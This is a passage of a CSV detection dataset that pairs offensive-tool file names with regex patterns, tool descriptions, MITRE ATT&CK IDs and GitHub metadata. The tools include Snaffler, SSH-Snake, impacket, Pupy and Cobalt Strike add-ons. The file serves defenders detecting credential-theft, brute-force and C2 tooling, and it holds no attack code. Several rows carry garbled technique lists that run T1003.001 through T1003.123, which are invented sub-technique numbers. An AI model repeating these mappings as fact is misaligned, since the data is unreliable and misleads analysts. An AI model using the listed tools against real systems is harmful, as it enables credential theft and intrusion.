T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - 
T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffCon/Snaffler*",".{0,1000}\/SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - 
T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffCore/*",".{0,1000}\/SnaffCore\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - 
T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/snaffler.py*",".{0,1000}\/snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*/snafflertest/*",".{0,1000}\/snafflertest\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - 
T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffPoint.git*",".{0,1000}\/SnaffPoint\.git.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*/Snake.nocomments.sh*",".{0,1000}\/Snake\.nocomments\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/Snake.sh*",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/sniffer.git*",".{0,1000}\/sniffer\.git.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*/sniffer-detect.nse*",".{0,1000}\/sniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-brute.nse*",".{0,1000}\/snmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-hh3c-logins.nse*",".{0,1000}\/snmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-info.nse*",".{0,1000}\/snmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-interfaces.nse*",".{0,1000}\/snmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-ios-config.nse*",".{0,1000}\/snmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-netstat.nse*",".{0,1000}\/snmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-processes.nse*",".{0,1000}\/snmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-sysdescr.nse*",".{0,1000}\/snmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-services.nse*",".{0,1000}\/snmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-shares.nse*",".{0,1000}\/snmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-software.nse*",".{0,1000}\/snmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-users.nse*",".{0,1000}\/snmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmpwn.git*",".{0,1000}\/snmpwn\.git.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/snmpwn.rb*",".{0,1000}\/snmpwn\.rb.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/SOAPHound.exe*",".{0,1000}\/SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SOAPHound.git*",".{0,1000}\/SOAPHound\.git.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SOAPHound/Program.cs*",".{0,1000}\/SOAPHound\/Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SocialBox.sh*",".{0,1000}\/SocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/SocialBox-Termux*",".{0,1000}\/SocialBox\-Termux.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/SocialPwned*",".{0,1000}\/SocialPwned.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/socks5proxy.py*",".{0,1000}\/socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/socks-auth-info.nse*",".{0,1000}\/socks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-brute.nse*",".{0,1000}\/socks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-open-proxy.nse*",".{0,1000}\/socks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SpaceRunner.git*",".{0,1000}\/SpaceRunner\.git.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/SpamChannel.git*",".{0,1000}\/SpamChannel\.git.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*/spawn.git*",".{0,1000}\/spawn\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/spellbound.git*",".{0,1000}\/spellbound\.git.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellgen.py *",".{0,1000}\/spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellstager.py *",".{0,1000}\/spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spider.yaml*",".{0,1000}\/spider\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/spider_plus.py*",".{0,1000}\/spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/SpiderFoot-*.log.cs*",".{0,1000}\/SpiderFoot\-.{0,1000}\.log\.cs.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderFoot.csv*",".{0,1000}\/SpiderFoot\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information 
